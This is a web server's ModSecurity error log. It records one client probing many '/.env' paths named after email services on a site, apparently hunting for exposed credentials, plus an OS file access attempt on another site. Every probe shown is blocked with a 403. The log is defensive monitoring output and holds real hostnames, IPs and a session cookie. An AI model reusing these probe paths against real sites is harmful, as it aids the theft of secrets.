[Mon May 11 14:10:26.412585 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /campaign/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/campaign/.env"] [unique_id "agHHMuJEyNRN152ArORzrwAAAFI"]
[Mon May 11 14:10:26.412984 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/campaign/.env"] [unique_id "agHHMuJEyNRN152ArORzrwAAAFI"]
[Mon May 11 14:10:26.413180 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/campaign/.env"] [unique_id "agHHMuJEyNRN152ArORzrwAAAFI"]
[Mon May 11 14:10:26.413424 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/campaign/.env"] [unique_id "agHHMuJEyNRN152ArORzrwAAAFI"]
[Mon May 11 14:10:26.667928 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /newsletter/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/newsletter/.env"] [unique_id "agHHMuJEyNRN152ArORzsAAAAFI"]
[Mon May 11 14:10:26.668331 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/newsletter/.env"] [unique_id "agHHMuJEyNRN152ArORzsAAAAFI"]
[Mon May 11 14:10:26.668516 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/newsletter/.env"] [unique_id "agHHMuJEyNRN152ArORzsAAAAFI"]
[Mon May 11 14:10:26.668739 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/newsletter/.env"] [unique_id "agHHMuJEyNRN152ArORzsAAAAFI"]
[Mon May 11 14:10:26.938768 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /ses/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/ses/.env"] [unique_id "agHHMuJEyNRN152ArORzsQAAAFI"]
[Mon May 11 14:10:26.939114 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/ses/.env"] [unique_id "agHHMuJEyNRN152ArORzsQAAAFI"]
[Mon May 11 14:10:26.939319 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/ses/.env"] [unique_id "agHHMuJEyNRN152ArORzsQAAAFI"]
[Mon May 11 14:10:26.939536 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/ses/.env"] [unique_id "agHHMuJEyNRN152ArORzsQAAAFI"]
[Mon May 11 14:10:27.231062 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sendgrid/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/sendgrid/.env"] [unique_id "agHHM-JEyNRN152ArORzsgAAAFI"]
[Mon May 11 14:10:27.231474 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/sendgrid/.env"] [unique_id "agHHM-JEyNRN152ArORzsgAAAFI"]
[Mon May 11 14:10:27.231667 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/sendgrid/.env"] [unique_id "agHHM-JEyNRN152ArORzsgAAAFI"]
[Mon May 11 14:10:27.231908 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/sendgrid/.env"] [unique_id "agHHM-JEyNRN152ArORzsgAAAFI"]
[Mon May 11 14:10:27.563345 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sparkpost/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/sparkpost/.env"] [unique_id "agHHM-JEyNRN152ArORzswAAAFI"]
[Mon May 11 14:10:27.563699 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/sparkpost/.env"] [unique_id "agHHM-JEyNRN152ArORzswAAAFI"]
[Mon May 11 14:10:27.563868 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/sparkpost/.env"] [unique_id "agHHM-JEyNRN152ArORzswAAAFI"]
[Mon May 11 14:10:27.564107 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/sparkpost/.env"] [unique_id "agHHM-JEyNRN152ArORzswAAAFI"]
[Mon May 11 14:10:27.855447 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /postmark/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/postmark/.env"] [unique_id "agHHM-JEyNRN152ArORztAAAAFI"]
[Mon May 11 14:10:27.855823 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/postmark/.env"] [unique_id "agHHM-JEyNRN152ArORztAAAAFI"]
[Mon May 11 14:10:27.856006 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/postmark/.env"] [unique_id "agHHM-JEyNRN152ArORztAAAAFI"]
[Mon May 11 14:10:27.856249 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/postmark/.env"] [unique_id "agHHM-JEyNRN152ArORztAAAAFI"]
[Mon May 11 14:10:27.994769 2026] [core:error] [pid 1319886:tid 1319928] [client 52.242.216.199:59628] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:10:27.994803 2026] [core:error] [pid 1319886:tid 1319928] [client 52.242.216.199:59628] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:10:28.115622 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mailgun/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/mailgun/.env"] [unique_id "agHHNOJEyNRN152ArORztQAAAFI"]
[Mon May 11 14:10:28.115974 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/mailgun/.env"] [unique_id "agHHNOJEyNRN152ArORztQAAAFI"]
[Mon May 11 14:10:28.116170 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/mailgun/.env"] [unique_id "agHHNOJEyNRN152ArORztQAAAFI"]
[Mon May 11 14:10:28.116402 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/mailgun/.env"] [unique_id "agHHNOJEyNRN152ArORztQAAAFI"]
[Mon May 11 14:10:28.276906 2026] [security2:error] [pid 1319998:tid 1320004] [client 216.73.216.110:5530] ModSecurity: Warning. Matched phrase ".bash_logout" at ARGS:rights. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: .bash_logout found within ARGS:rights: .bash_logout"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/js/lightbox/"] [unique_id "agHHNKt2WtvoFr7xvGy9PwAAAIQ"]
[Mon May 11 14:10:28.277866 2026] [security2:error] [pid 1319998:tid 1320004] [client 216.73.216.110:5530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/js/lightbox/"] [unique_id "agHHNKt2WtvoFr7xvGy9PwAAAIQ"]
[Mon May 11 14:10:28.367289 2026] [security2:error] [pid 1319998:tid 1320004] [client 216.73.216.110:5530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agHHNKt2WtvoFr7xvGy9PwAAAIQ"]
[Mon May 11 14:10:28.454828 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mandrill/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/mandrill/.env"] [unique_id "agHHNOJEyNRN152ArORztgAAAFI"]
[Mon May 11 14:10:28.455227 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/mandrill/.env"] [unique_id "agHHNOJEyNRN152ArORztgAAAFI"]
[Mon May 11 14:10:28.455412 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/mandrill/.env"] [unique_id "agHHNOJEyNRN152ArORztgAAAFI"]
[Mon May 11 14:10:28.455646 2026] [security2:error] [pid 1320398:tid 1320418] [client 54.255.173.22:54200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/mandrill/.env"] [unique_id "agHHNOJEyNRN152ArORztgAAAFI"]
